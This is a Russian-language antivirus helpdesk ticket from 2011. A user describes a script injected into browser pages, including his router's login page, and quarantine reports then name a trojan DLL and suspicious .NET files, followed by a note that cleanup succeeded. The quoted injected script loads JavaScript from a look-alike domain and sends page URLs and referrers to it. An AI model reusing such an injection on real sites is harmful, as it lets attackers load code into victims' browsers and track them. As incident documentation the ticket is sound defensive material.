-
Вредоносная программа, которая ничем не определяется (заявка №88193)
Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
Господа, нужна помощь!
Домашняя сеть WI-FI построена на dir-615. При обращении с ПК с установленным KIS 11.0.2.556 (a,b,c,d,e,f) и с последними обновлениями на домашнюю страницу dir-615 с адресом 192.168.0.1 браузеры Firefox 5.0, Safary 5.0.5 пытается выполнить скрипт:
<script>if(self==top){ document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") + "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("Wp4d0bs3Kq KEahPLm/cwrmOzeYcbX7DgGVcRN1zGDaq0wci714ACDij4e70bm483")+" &r="+escape(document.referrer)+"&u="+escape(doc ume nt.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body></html> который не дает ввести пароль в течении нескольких минут!
Аналогичный скрипт не дает Firefox после регистрации зайти на http://kaspersky-911.ru
Opera 11.11 вообще перестала видеть Инет, пришлось снести.
IE 9 на этом же ПК работает нормально не обнаружив этого скрипта. При просмотре этой же страницы с iPad, iPhone этот скрипт так же отсутствует. Полное сканирование KIS и AVZ в нормальном и защищенном режиме файловой системы зловреда не выявило.
Утилита HousecallLauncher (с последними обновлениями) не определяет вредоносного кода.
Нужна помощь по обнаружению зловреда.
Дата обращения: 22.06.2011 0:39:35
Номер заявки: 88193
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Отчет о карантине
22.06.2011 2:20:06 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\Windows\\system32\\rbdtewh.dll - Trojan.Win32.Zapchast.hcz
- размер: 53248 байт
- детект других антивирусов: DrWEB 6.0: Зловред Trojan.Siggen2.43179
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \Microsoft.VisualC\\f7ce61c1a288adc4c39512d9f6767d af\\Microsoft.VisualC.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 15872 байт
- версия: "8.00.50727.4927"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.Configuratio#\\477e5759f38ff8045a525e4f652 82c3c\\System.Configuration.Install.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 141312 байт
- версия: "2.0.50727.5420 (Win7SP1.050727-5400)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.EnterpriseSe#\\3675db4c02d762278716f4a32db 61e15\\System.EnterpriseServices.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 628224 байт
- версия: "2.0.50727.5420 (Win7SP1.050727-5400)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.Transactions\\6a5e1084d24d779e937e405672fd fbfe\\System.Transactions.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 627200 байт
- версия: "2.0.50727.4927 (NetFXspW7.050727-4900)"
- копирайты: "© Microsoft Corporation. All rights reserved."
-
-
Отчет о карантине
22.06.2011 9:40:09 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\Windows\\system32\\rbdtewh.dll - Trojan.Win32.Zapchast.hcz
- размер: 53248 байт
- детект других антивирусов: DrWEB 6.0: Зловред Trojan.Siggen2.43179
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \Microsoft.VisualC\\f7ce61c1a288adc4c39512d9f6767d af\\Microsoft.VisualC.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 15872 байт
- версия: "8.00.50727.4927"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.Configuratio#\\477e5759f38ff8045a525e4f652 82c3c\\System.Configuration.Install.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 141312 байт
- версия: "2.0.50727.5420 (Win7SP1.050727-5400)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.EnterpriseSe#\\3675db4c02d762278716f4a32db 61e15\\System.EnterpriseServices.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 628224 байт
- версия: "2.0.50727.5420 (Win7SP1.050727-5400)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\ \System.Transactions\\6a5e1084d24d779e937e405672fd fbfe\\System.Transactions.ni.dll - подозрительный, обрабатывается вирлабом
- размер: 627200 байт
- версия: "2.0.50727.4927 (NetFXspW7.050727-4900)"
- копирайты: "© Microsoft Corporation. All rights reserved."
-
-
Итог лечения
22.06.2011 10:33:11 лечение успешно завершено
-